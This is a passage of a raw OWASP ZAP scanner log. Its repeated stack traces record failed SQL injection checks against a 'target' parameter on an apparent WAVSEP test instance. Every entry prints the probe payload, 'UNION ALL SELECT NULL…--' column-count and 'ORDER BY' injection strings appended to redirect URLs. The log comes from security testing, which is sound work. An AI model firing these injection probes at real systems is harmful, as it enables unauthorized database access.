org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681751 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681751 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681752 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681753 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681754 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681754 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681756 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681756 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681757 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com ORDER BY 8808-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com ORDER BY 8808-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681758 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681758 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681759 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681760 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown 